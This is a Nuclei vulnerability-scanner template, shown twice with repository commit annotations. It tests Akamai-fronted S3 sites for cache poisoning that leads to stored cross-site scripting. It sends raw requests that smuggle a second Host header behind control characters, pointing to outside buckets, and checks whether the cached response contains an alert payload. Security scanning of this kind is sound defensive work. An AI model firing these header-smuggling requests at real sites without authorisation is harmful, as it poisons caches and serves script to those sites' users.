nuclei-templates/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml

id: akamai-s3-cache-poisoning

info:
  name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting
  author: DhiyaneshDk
  severity: high
  reference:
    - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
    - https://owasp.org/www-community/attacks/Cache_Poisoning
  metadata:
    verified: "true"
  tags: cache,poisoning,generic,xss,akamai,s3

variables:
  rand: "{{rand_base(5)}}"

requests:
  - raw:
      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}
        {{escape}}Host: {{bucket}}

      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}

    attack: clusterbomb
    payloads:
      escape:
        - "\x0b"
        - "\x0c"
        - "\x1c"
        - "\x1d"
        - "\x1e"
        - "\x1f"

      bucket:
        - "nuclei-ap-northeast-1"
        - "nuclei-ap-northeast-2"
        - "nuclei-ap-northeast-3"
        - "nuclei-ap-south-1"
        - "nuclei-ap-southeast-1"
        - "nuclei-ap-southeast-2"
        - "nuclei-ca-central-1"
        - "nuclei-eu-central-1"
        - "nuclei-eu-north-1"
        - "nuclei-eu-west-1"
        - "nuclei-eu-west-2"
        - "nuclei-eu-west-3"
        - "nuclei-sa-east-1"
        - "nuclei-us-east-1"
        - "nuclei-us-east-2"
        - "nuclei-us-west-1"
        - "nuclei-us-west-2"

    stop-at-first-match: true
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "alert(document.domain)")'
          - 'status_code_2 == 200'
        condition: and
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`id: akamai-s3-cache-poisoning`

			`info:`
			`name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting`
			`author: DhiyaneshDk`
			`severity: high`
			`reference:`
Update akamai-s3-cache-poisoning.yaml URL no longer available, update using webarchive. 2023-01-19 22:07:50 +00:00			`- https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`- https://owasp.org/www-community/attacks/Cache_Poisoning`
			`metadata:`
			`verified: "true"`
			`tags: cache,poisoning,generic,xss,akamai,s3`

			`variables:`
			`rand: "{{rand_base(5)}}"`

			`requests:`
			`- raw:`
			`- \|+`
			`GET /nuclei.svg?{{rand}}=x HTTP/1.1`
			`Host: {{Hostname}}`
			`{{escape}}Host: {{bucket}}`

			`- \|+`
			`GET /nuclei.svg?{{rand}}=x HTTP/1.1`
			`Host: {{Hostname}}`

			`attack: clusterbomb`
			`payloads:`
			`escape:`
			`- "\x0b"`
			`- "\x0c"`
			`- "\x1c"`
			`- "\x1d"`
			`- "\x1e"`
			`- "\x1f"`

			`bucket:`
			`- "nuclei-ap-northeast-1"`
			`- "nuclei-ap-northeast-2"`
			`- "nuclei-ap-northeast-3"`
			`- "nuclei-ap-south-1"`
			`- "nuclei-ap-southeast-1"`
			`- "nuclei-ap-southeast-2"`
			`- "nuclei-ca-central-1"`
			`- "nuclei-eu-central-1"`
			`- "nuclei-eu-north-1"`
			`- "nuclei-eu-west-1"`
			`- "nuclei-eu-west-2"`
			`- "nuclei-eu-west-3"`
			`- "nuclei-sa-east-1"`
			`- "nuclei-us-east-1"`
			`- "nuclei-us-east-2"`
			`- "nuclei-us-west-1"`
			`- "nuclei-us-west-2"`

			`stop-at-first-match: true`
			`unsafe: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body_2, "alert(document.domain)")'`
			`- 'status_code_2 == 200'`
			`condition: and`